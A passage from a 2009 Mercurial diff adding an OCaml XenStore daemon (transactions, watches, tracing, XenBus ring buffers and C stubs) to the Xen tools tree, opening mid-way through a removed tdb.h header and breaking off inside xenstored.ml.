locking functions: use with care */ -int tdb_chainlock(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_chainunlock(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_chainlock_read(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_chainunlock_read(TDB_CONTEXT *tdb, TDB_DATA key); -TDB_CONTEXT *tdb_copy(TDB_CONTEXT *tdb, const char *outfile); - -/* Debug functions. Not used in production. */ -void tdb_dump_all(TDB_CONTEXT *tdb); -int tdb_printfreelist(TDB_CONTEXT *tdb); - -extern TDB_DATA tdb_null; - -#ifdef __cplusplus -} -#endif - -#endif /* tdb.h */ diff -r 10a8fae412c5 tools/xenstore/trace.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/trace.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,41 @@ +(* + Tracing for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Trace file descriptor *) +let traceout = ref None + +(* Output a trace string *) +let out str = + match !traceout with + | Some channel -> Printf.fprintf channel "%s" str; flush channel + | None -> () + +(* Trace a creation *) +let create data t = + out (Printf.sprintf "CREATE %s %d\n" t data) + +(* Trace a destruction *) +let destroy data t = + out (Printf.sprintf "DESTROY %s %d\n" t data) + +(* Trace I/O *) +let io domain_id prefix time message = + let message_type = Message.message_type_to_string message.Message.header.Message.message_type + and sanitised_data = Utils.sanitise_string message.Message.payload in + out (Printf.sprintf "%s %d %s %s (%s)\n" prefix domain_id time message_type sanitised_data) diff -r 10a8fae412c5 tools/xenstore/transaction.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/transaction.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,287 @@ +(* + Transactions for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +type tr = + { + domain_id : int; + transaction_id : int32 + } + +type operation = + | NONE + | READ + | WRITE + | RM + +type element = + { + transaction : tr; + operation : operation; + path : string; + mutable modified : bool + } + +type changed_domain = + { + id : int; + entries : int + } + +let equal t1 t2 = + t1.domain_id = t2.domain_id && t1.transaction_id = t2.transaction_id + +let fire_watch watches changed_node = + match changed_node.operation with + | RM -> watches#fire_watches changed_node.path false true + | WRITE -> watches#fire_watches changed_node.path false false + | _ -> () + +let fire_watches watches changed_nodes = + List.iter (fire_watch watches) changed_nodes + +let make domain_id transaction_id = + { + domain_id = domain_id; + transaction_id = transaction_id + } + +let make_element transaction operation path = + { + transaction = transaction; + operation = operation; + path = path; + modified = false + } + +module Transaction_hashtbl = + Hashtbl.Make + (struct + type t = tr + let equal = equal + let hash = Hashtbl.hash + end) + +class transaction_reads = +object (self) + val m_paths = Hashtbl.create 32 + val m_transactions = Transaction_hashtbl.create 8 + method private paths = m_paths + method private transactions = m_transactions + method add transaction path = + let operation = make_element transaction READ path + and paths = self#paths + and transactions = self#transactions in + let path_operations = + if Hashtbl.mem paths path + then + let current_operations = Hashtbl.find paths path in + if not (List.exists (fun op -> transaction = op.transaction) current_operations) + then operation :: current_operations + else current_operations + else [ operation ] + and transaction_operations = + if Transaction_hashtbl.mem transactions 
transaction + then + let current_operations = Transaction_hashtbl.find transactions transaction in + if not (List.exists (fun op -> path = op.path) current_operations) + then operation :: current_operations + else current_operations + else [ operation ] in + Hashtbl.replace paths path path_operations; + Transaction_hashtbl.replace transactions transaction transaction_operations + method path_operations path = Hashtbl.find self#paths path + method remove_path_operation operation = + let remaining = List.filter (fun op -> not (equal op.transaction operation.transaction)) (self#path_operations operation.path) in + if List.length remaining > 0 + then Hashtbl.replace self#paths operation.path remaining + else Hashtbl.remove self#paths operation.path + method remove_transaction_operations transaction = + (try List.iter self#remove_path_operation (self#transaction_operations transaction) with Not_found -> ()); + Transaction_hashtbl.remove self#transactions transaction + method transaction_operations transaction = Transaction_hashtbl.find self#transactions transaction +end + +class ['contents] transaction_store (transaction : tr) (store : 'contents Store.store) (reads : transaction_reads) = +object (self) + inherit ['contents]Store.store as super + val m_reads = reads + val m_store = store + val m_transaction = transaction + val m_updates = Hashtbl.create 8 + method private domain_id = self#transaction.domain_id + method private merge_node node = + if self#op_exists node#path WRITE || self#op_exists node#path RM || self#op_exists node#path NONE + then self#store#replace_node node + else + match node#contents with + | Store.Children children | Store.Hack (_, children) -> List.iter (fun child -> self#merge_node child) children + | _ -> () + method private op_add path op = + match op with + | WRITE -> if not (self#op_exists path RM) then Hashtbl.replace self#updates path (make_element self#transaction op path) + | RM -> Hashtbl.replace self#updates path (make_element 
self#transaction op path) + | READ -> if not (self#op_exists path READ) then self#reads#add self#transaction path + | NONE -> Hashtbl.replace self#updates path (make_element self#transaction op path) + method private op_exists path op = + match op with + | WRITE | RM | NONE -> (try (Hashtbl.find self#updates path).operation = op with Not_found -> false) + | READ -> (try List.exists (fun op -> op.transaction = self#transaction) (self#reads#path_operations path) with Not_found -> false) + method private reads = m_reads + method private store = m_store + method private transaction = m_transaction + method private updates = m_updates + method changed_nodes = Hashtbl.fold (fun path element nodes -> element :: nodes) self#updates [] + method create_node path = + if not (self#op_exists path WRITE) then self#op_add path WRITE; + super#create_node path + method merge = self#merge_node self#root + method node_exists path = + if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE then super#node_exists path else self#store#node_exists path + method read_node path = + if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE + then super#read_node path + else ( + self#op_add path READ; + self#store#read_node path + ) + method remove_node path = + let parent_path = Store.parent_path path in + if self#op_exists parent_path WRITE || self#op_exists parent_path RM || self#op_exists parent_path NONE + then ( + super#remove_node path; + self#op_add path RM + ) + else ( + if not (super#node_exists parent_path) + then ( + super#create_node parent_path; + let contents = + (match (self#store#read_node parent_path) with + | Store.Children _ -> Store.Children [] + | Store.Hack (value, _) -> Store.Hack (value, []) + | contents -> contents) in + (super#get_node parent_path)#set_contents contents + ); + let self_parent_node = self#get_node parent_path in + match self_parent_node#contents with + | Store.Children self_parent_children | 
Store.Hack (_, self_parent_children) -> ( + (match self#store#read_node parent_path with + | Store.Children store_parent_children | Store.Hack (_, store_parent_children) -> List.iter (fun store_parent_child -> if not (List.exists (fun self_parent_child -> Store.compare self_parent_child store_parent_child = 0) self_parent_children) then ignore (self_parent_node#add_child store_parent_child)) store_parent_children + | Store.Empty -> () + | Store.Value _ -> raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#remove_node", path))); + self_parent_node#remove_child path; + self#op_add path RM; + self#op_add parent_path NONE + ) + | _ -> raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#remove_node", path)) + ) + method write_node path (contents : 'contents) = + if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE + then ( + if not (super#node_exists path) then super#create_node path; + self#op_add path WRITE; + super#write_node path contents + ) + else if self#store#node_exists path + then ( + self#create_node path; + super#write_node path contents + ) + else raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#write_node", path)) +end + +class ['contents] transactions (store : 'contents Store.store) = +object (self) + val m_base_store = store + val m_num_transactions = Hashtbl.create 8 + val m_reads = new transaction_reads + val m_transaction_changed_domains = Transaction_hashtbl.create 8 + val m_transaction_ids = Hashtbl.create 8 + val m_transactions = Transaction_hashtbl.create 8 + method private add transaction store = + if not (Transaction_hashtbl.mem self#transactions transaction) + then ( + Transaction_hashtbl.add self#transactions transaction (new transaction_store transaction store self#reads); + Transaction_hashtbl.add self#transaction_changed_domains transaction [ { id = transaction.domain_id; entries = 0 } ]; + Hashtbl.replace self#num_transactions 
transaction.domain_id (try succ (self#num_transactions_for_domain transaction.domain_id) with Not_found -> 1); + ) + method private num_transactions = m_num_transactions + method private reads = m_reads + method private remove transaction = + self#reads#remove_transaction_operations transaction; + Transaction_hashtbl.remove self#transactions transaction; + Transaction_hashtbl.remove self#transaction_changed_domains transaction; + Hashtbl.replace self#num_transactions transaction.domain_id (pred (self#num_transactions_for_domain transaction.domain_id)) + method private transaction_changed_domains = m_transaction_changed_domains + method private transaction_ids = m_transaction_ids + method private transaction_store transaction = Transaction_hashtbl.find self#transactions transaction + method private transactions = m_transactions + method private validate transaction = + try not (List.fold_left (fun modified op -> if equal op.transaction transaction then op.modified || modified else modified) false (self#reads#transaction_operations transaction)) + with _ -> true + method base_store = m_base_store + method commit transaction = + if self#validate transaction + then ( + let tstore = self#transaction_store transaction in + let changed_nodes = tstore#changed_nodes in + self#invalidate_nodes changed_nodes; + tstore#merge; + self#remove transaction; + changed_nodes + ) + else ( + self#remove transaction; + raise Not_found + ) + method domain_entries transaction = Transaction_hashtbl.find self#transaction_changed_domains transaction + method domain_entry_decr (transaction : tr) domain_id = + try + let domain_entry = List.find (fun entry -> entry.id = domain_id) (self#domain_entries transaction) in + let new_domain_entry = { id = domain_id; entries = pred domain_entry.entries } in + Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (List.filter (fun entry -> entry.id <> domain_id) (self#domain_entries transaction))) + with Not_found 
-> + let new_domain_entry = { id = domain_id; entries = (- 1) } in + Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (self#domain_entries transaction)) + method domain_entry_incr (transaction : tr) domain_id = + try + let domain_entry = List.find (fun entry -> entry.id = domain_id) (self#domain_entries transaction) in + let new_domain_entry = { id = domain_id; entries = succ domain_entry.entries } in + Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (List.filter (fun entry -> entry.id <> domain_id) (self#domain_entries transaction))) + with Not_found -> + let new_domain_entry = { id = domain_id; entries = 1 } in + Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (self#domain_entries transaction)) + method exists transaction = Transaction_hashtbl.mem self#transactions transaction + method invalidate path = try List.iter (fun op -> op.modified <- true) (self#reads#path_operations path) with Not_found -> () + method invalidate_nodes nodes = List.iter (fun node -> self#invalidate node.path) nodes + method new_transaction (domain : Domain.domain) store = + if not (Hashtbl.mem self#transaction_ids domain#id) then Hashtbl.add self#transaction_ids domain#id 1l; + let transaction_id = Hashtbl.find self#transaction_ids domain#id in + let transaction = make domain#id transaction_id in + Hashtbl.replace self#transaction_ids domain#id (Int32.succ transaction_id); + if not (Transaction_hashtbl.mem self#transactions transaction) && transaction.transaction_id <> 0l + then (self#add transaction store; transaction) + else self#new_transaction domain store + method num_transactions_for_domain domain_id = try Hashtbl.find self#num_transactions domain_id with Not_found -> 0 + method remove_domain (domain : Domain.domain) = + Transaction_hashtbl.iter (fun transaction store -> if transaction.domain_id = domain#id then self#remove transaction) 
self#transactions; + Hashtbl.remove self#num_transactions domain#id; + Hashtbl.remove self#transaction_ids domain#id + method store transaction = try ((self#transaction_store transaction) :> 'contents Store.store) with Not_found -> self#base_store +end diff -r 10a8fae412c5 tools/xenstore/utils.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/utils.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,122 @@ +(* + Utils for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Print an error to standard output stream and die *) +let barf str = + Printf.printf "FATAL: %s\n" str; flush stdout; + ignore (exit 1) + +(* Print an error to the error stream and die *) +let barf_perror str = + Printf.eprintf "FATAL: %s\n" str; flush stderr; + ignore (exit 1) + +(* Convert a string of bytes into an int32 *) +let bytes_to_int32 bytes = + let num_bytes = 4 in + (* Convert bytes to an int32 *) + let rec loop i n = + if i >= num_bytes + then n + else loop (succ i) (Int32.add (Int32.shift_left n 8) (Int32.of_int (int_of_char bytes.[(num_bytes - 1) - i]))) + in + loop 0 Int32.zero + +(* Convert a string of bytes into an int *) +let bytes_to_int bytes = + Int32.to_int (bytes_to_int32 bytes) + +let combine lst = + List.fold_left (fun rest i -> rest ^ i) Constants.null_string lst + +let combine_with_string lst str = + List.fold_left (fun rest i -> rest ^ i ^ str) Constants.null_string lst + +(* Convert an int into a string of bytes *) +let int32_to_bytes num = + let num_bytes = 4 in + let bytes = String.create num_bytes in + let rec loop i n = + if i < num_bytes + then ( + bytes.[i] <- char_of_int (Int32.to_int (Int32.logand 0xFFl n)); + loop (succ i) (Int32.shift_right_logical n 8) + ) + in + loop 0 num; + bytes + +(* Convert an int into a string of bytes *) +let int_to_bytes num = + int32_to_bytes (Int32.of_int num) + +(* Null terminate a string *) +let null_terminate str = + str ^ (String.make 1 Constants.null_char) + +(* Remove the last element from a list *) +let remove_last list = + let length = pred (List.length list) in + let rec loop n = (if (n = length) then [] else (List.nth list n :: loop (succ n))) in + loop 0 + +(* Clean a string up for output *) +let sanitise_string str = + let replacement_string = String.make 1 ' ' in + let rec 
replace_nulls s = + try + let i = String.index s Constants.null_char in + (String.sub s 0 i) ^ replacement_string ^ (replace_nulls (String.sub s (succ i) ((String.length s) - (succ i)))) + with Not_found -> s + in + replace_nulls str + +(* Split a string into a list of strings based on the specified character *) +let split_on_char str char = + let rec split_loop s = + if (s = Constants.null_string) then [] + else + try + let null_index = String.index s char in + String.sub s 0 null_index :: split_loop (String.sub s (succ null_index) ((String.length s) - (succ null_index))) + with Not_found -> [ s ] | Invalid_argument _ -> [] + in + split_loop str + +(* Split a string into a list of strings based on the null character *) +let split str = + split_on_char str Constants.null_char + +(* Strip the trailing null byte off a string, if there is one *) +let strip_null str = + if String.length str = 0 then str + else + let last = pred (String.length str) in + if str.[last] = Constants.null_char then String.sub str 0 last else str + +(* Return if a string contains another string *) +let rec strstr s1 s2 = + try + let i = String.index s1 s2.[0] in + if String.length (String.sub s1 i ((String.length s1) - i)) < String.length s2 + then false + else if String.sub s1 i (String.length s2) = s2 + then true + else strstr (String.sub s1 (succ i) ((String.length s1) - (succ i))) s2 + with Not_found -> false diff -r 10a8fae412c5 tools/xenstore/watch.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/watch.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,106 @@ +(* + Watches for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +type t = + { + domain : Domain.domain; + path : string; + token : string; + relative : bool + } + +let make domain path token relative = + { + domain = domain; + path = path; + token = token; + relative = relative + } + +let equal watch1 watch2 = + watch1.domain#id = watch2.domain#id && watch1.token = watch2.token && watch1.path = watch2.path + +(* Fire a watch *) +let fire_watch path recurse watch = + let relative_base_path = Store.domain_root ^ (string_of_int watch.domain#id) in + let relative_base_length = succ (String.length relative_base_path) in + if Store.is_child path watch.path + then + let watch_path = + if watch.relative + then String.sub path relative_base_length ((String.length path) - relative_base_length) + else path in + watch.domain#add_output_message (Message.event ((Utils.null_terminate watch_path) ^ (Utils.null_terminate watch.token))) + else if recurse && Store.is_child watch.path path + then + let watch_path = + if watch.relative + then String.sub watch.path relative_base_length ((String.length watch.path) - relative_base_length) + else watch.path in + watch.domain#add_output_message (Message.event ((Utils.null_terminate watch_path) ^ (Utils.null_terminate watch.token))) + +class watches = +object(self) + val m_domain_watches = Hashtbl.create 16 + val m_watches = Hashtbl.create 32 + method private add_domain_watch watch = + let watches = try Hashtbl.find self#domain_watches watch.domain#id with Not_found -> [] in + Hashtbl.replace self#domain_watches watch.domain#id (watch :: watches) + method 
private domain_watches = m_domain_watches + method private remove_domain_watch watch = + let watches = try Hashtbl.find self#domain_watches watch.domain#id with Not_found -> [] in + Hashtbl.replace self#domain_watches watch.domain#id (List.filter (fun w -> not (equal watch w)) watches) + method private watches = m_watches + method add (watch : t) = + if Hashtbl.mem self#watches watch.path + then ( + let path_watches = Hashtbl.find self#watches watch.path in + try ignore (List.find (equal watch) path_watches); false + with Not_found -> ( + Hashtbl.replace self#watches watch.path (watch :: path_watches); + self#add_domain_watch watch; + true + ) + ) + else ( + Hashtbl.add self#watches watch.path [ watch ]; + self#add_domain_watch watch; + true + ) + method fire_watches path in_transaction recursive = + if not in_transaction then Hashtbl.iter (fun _ watches -> List.iter (fire_watch path recursive) watches) self#watches + method num_watches_for_domain domain_id = try List.length (Hashtbl.find self#domain_watches domain_id) with Not_found -> 0 + method remove (watch : t) = + if Hashtbl.mem self#watches watch.path + then ( + let remaining_watches = List.filter (fun w -> not (equal watch w)) (Hashtbl.find self#watches watch.path) in + if List.length remaining_watches > 0 + then Hashtbl.replace self#watches watch.path remaining_watches + else Hashtbl.remove self#watches watch.path; + self#remove_domain_watch watch; + true + ) + else false + method remove_watches (domain : Domain.domain) = + if Hashtbl.mem self#domain_watches domain#id + then ( + List.iter (fun watch -> if self#remove watch then Trace.destroy watch.domain#id "watch") (Hashtbl.find self#domain_watches domain#id); + Hashtbl.remove self#domain_watches domain#id; + ) +end diff -r 10a8fae412c5 tools/xenstore/xenbus.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/xenbus.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,102 @@ +(* + XenBus for OCaml XenStore Daemon. 
+ Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let ring_size = 1024 + +type xenbus_t +type ring_t +type ring_index_t + +external init_req_cons : xenbus_t -> ring_index_t = "init_req_cons_c" +external init_req_prod : xenbus_t -> ring_index_t = "init_req_prod_c" +external init_req_ring : xenbus_t -> ring_t = "init_req_ring_c" +external init_rsp_cons : xenbus_t -> ring_index_t = "init_rsp_cons_c" +external init_rsp_prod : xenbus_t -> ring_index_t = "init_rsp_prod_c" +external init_rsp_ring : xenbus_t -> ring_t = "init_rsp_ring_c" +external read_ring : ring_t -> int -> string -> int -> int -> unit = "read_ring_c" +external write_ring : ring_t -> int -> string -> int -> int -> unit = "write_ring_c" +external get_index : ring_index_t -> int32 = "get_index_c" +external set_index : ring_index_t -> int32 -> unit = "set_index_c" +external mmap : int -> xenbus_t = "mmap_c" +external map_foreign : int -> int -> int -> xenbus_t = "xc_map_foreign_range_c" +external munmap : xenbus_t -> unit = "munmap_c" +external mb : unit -> unit = "mb_c" + +(* Ring buffer *) +class ring_buffer ring consumer producer = +object (self) + val m_consumer = consumer + val m_producer = producer + val m_ring = ring + method private advance_consumer amount = set_index m_consumer (Int32.add 
self#consumer (Int32.of_int amount)) + method private advance_producer amount = set_index m_producer (Int32.add self#producer (Int32.of_int amount)) + method private check_indexes = self#diff <= ring_size + method private consumer = get_index m_consumer + method private diff = Int32.to_int (Int32.sub self#producer self#consumer) + method private mask_index index = (Int32.to_int index) land (pred ring_size) + method private producer = get_index m_producer + method private ring = m_ring + method private set_producer index = set_index m_producer index + method can_read = self#diff <> 0 + method can_write = self#diff <> ring_size + method read buffer offset length = + let start = self#mask_index self#consumer + and diff = self#diff in + if not self#check_indexes then raise (Constants.Xs_error (Constants.EIO, "ring_buffer#read_ring", "could not check indexes")); + mb (); + let read_length = min (min diff length) (ring_size - start) in + read_ring self#ring start buffer offset read_length; + mb (); + self#advance_consumer read_length; + read_length + method write buffer offset length = + let start = self#mask_index self#producer + and diff = self#diff in + if not self#check_indexes then raise (Constants.Xs_error (Constants.EIO, "ring_buffer#write_ring", "could not check indexes")); + mb (); + let write_length = min (min (ring_size - diff) length) (ring_size - start) in + write_ring self#ring start buffer offset write_length; + mb (); + self#advance_producer write_length; + write_length +end + +(* XenBus interface *) +class xenbus_interface port xenbus = +object (self) + inherit Interface.interface as super + val m_port = port + val m_request_ring = new ring_buffer (init_req_ring xenbus) (init_req_cons xenbus) (init_req_prod xenbus) + val m_response_ring = new ring_buffer (init_rsp_ring xenbus) (init_rsp_cons xenbus) (init_rsp_prod xenbus) + val m_xenbus = xenbus + method private port = m_port + method private request_ring = m_request_ring + method private response_ring = 
m_response_ring + method can_read = self#request_ring#can_read + method can_write = self#response_ring#can_write + method destroy = if Eventchan.unbind self#port then munmap m_xenbus + method read buffer offset length = + let bytes_read = self#request_ring#read buffer offset (min length (String.length buffer)) in + Eventchan.notify self#port; + bytes_read + method write buffer offset length = + let bytes_written = self#response_ring#write buffer offset (min length (String.length buffer)) in + Eventchan.notify self#port; + bytes_written +end diff -r 10a8fae412c5 tools/xenstore/xenbus_c.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/xenbus_c.c Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,204 @@ +/* + XenBus C stubs for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*/ + +#include +#include +#include +#include +#include + +#include +#include + +#include +#include +#include +#include + +/* Memory barrier */ +value mb_c (value dummy) +{ + CAMLparam1 (dummy); + + asm volatile ( "lock; addl $0,0(%%esp)" : : : "memory" ); + + CAMLreturn (Val_unit); +} + +/* Map a file */ +value mmap_c (value fd_v) +{ + CAMLparam1 (fd_v); + + int fd = Int_val (fd_v); + long pagesize = getpagesize(); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) mmap(NULL, pagesize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); + + CAMLreturn (rv); +} + +/* Unmap a file */ +value munmap_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + long pagesize = getpagesize(); + + CAMLreturn (Val_int (munmap(intf, pagesize))); +} + +/* Map a foreign page */ +value xc_map_foreign_range_c (value xc_handle_v, value domid_v, value mfn_v) +{ + CAMLparam3 (xc_handle_v, domid_v, mfn_v); + + int xc_handle = Int_val (xc_handle_v); + long pagesize = getpagesize(); + uint32_t domid = (uint32_t)(Int_val (domid_v)); + unsigned long mfn = (unsigned long)(Int_val (mfn_v)); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) xc_map_foreign_range(xc_handle, domid, pagesize, PROT_READ|PROT_WRITE, mfn); + + CAMLreturn (rv); +} + +value get_index_c (value index_v) +{ + CAMLparam1 (index_v); + + uint32_t i = *(uint32_t *)(Field (index_v, 0)); + + CAMLreturn (caml_copy_int32(i)); +} + +value set_index_c (value index_v, value val_v) +{ + CAMLparam2 (index_v, val_v); + + uint32_t i = Int32_val (val_v); + *(uint32_t *)(Field (index_v, 0)) = i; + + CAMLreturn (Val_unit); +} + +value init_req_ring_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct 
xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->req); + + CAMLreturn (rv); +} + +value init_rsp_ring_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->rsp); + + CAMLreturn (rv); +} + +value init_req_cons_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->req_cons); + + CAMLreturn (rv); +} + +value init_req_prod_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->req_prod); + + CAMLreturn (rv); +} + +value init_rsp_cons_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->rsp_cons); + + CAMLreturn (rv); +} + +value init_rsp_prod_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->rsp_prod); + + CAMLreturn (rv); +} + +/* Read from a ring buffer */ +value read_ring_c (value ring_v, value ring_ofs_v, value buff_v, value buff_ofs_v, value len_v) +{ + CAMLparam5 (ring_v, ring_ofs_v, buff_v, buff_ofs_v, len_v); + + char *ring = (char *)(Field (ring_v, 0)); + char *buff = String_val (buff_v); + int ring_ofs = Int_val (ring_ofs_v); + int buff_ofs = Int_val (buff_ofs_v); + int len = Int_val (len_v); + int i; + + for (i = 0; i < 
len; i++) { + buff[buff_ofs + i] = ring[ring_ofs + i]; + } + + CAMLreturn (Val_unit); +} + +/* Write to a ring buffer */ +value write_ring_c (value ring_v, value ring_ofs_v, value buff_v, value buff_ofs_v, value len_v) +{ + CAMLparam5 (ring_v, ring_ofs_v, buff_v, buff_ofs_v, len_v); + + char *ring = (char *)(Field (ring_v, 0)); + char *buff = String_val (buff_v); + int ring_ofs = Int_val (ring_ofs_v); + int buff_ofs = Int_val (buff_ofs_v); + int len = Int_val (len_v); + int i; + + for (i = 0; i < len; i++) { + ring[ring_ofs + i] = buff[buff_ofs + i]; + } + + CAMLreturn (Val_unit); +} diff -r 10a8fae412c5 tools/xenstore/xenstored.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/xenstored.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,135 @@ +(* + OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let domxs_init id = + let port = Eventchan.bind_interdomain id (Os.get_xenbus_port ()) in + let interface = Os.map_xenbus port in + let connection = new Connection.connection interface in + Eventchan.notify port; + new Domain.domain id connection + +let domain_entry_change domains domain_entry = + if (domain_entry.Transaction.entries > 0) + then + for i = 1 to domain_entry.Transaction.entries do + domains#entry_incr domain_entry.Transaction.id + done + else if (domain_entry.Transaction.entries < 0) + then + for i = domain_entry.Transaction.entries to (- 1) do + domains#entry_decr domain_entry.Transaction.id + done + +class xenstored options store = +object(self) + val m_domains = new Domain.domains + val m_options : Option.t = options + val m_permissions = new Permission.permissions + val m_transactions = new Transaction.transactions store + val m_store = store + val m_watches = new Watch.watches + val mutable m_virq_port = Constants.null_file_descr + initializer m_permissions#set [ (Permission.string_of_permission (Permission.make Permission.NONE 0)) ] store Store.root_path; self#initialise_store + method private store = m_store + method add_domain domain = + self#domains#add domain; + Trace.create domain#id "connection" + method add_watch (domain : Domain.domain) watch = + if not (Domain.is_unprivileged domain) || self#watches#num_watches_for_domain domain#id < self#options.Option.quota_num_watches_per_domain + then self#watches#add watch + else raise (Constants.Xs_error (Constants.E2BIG, 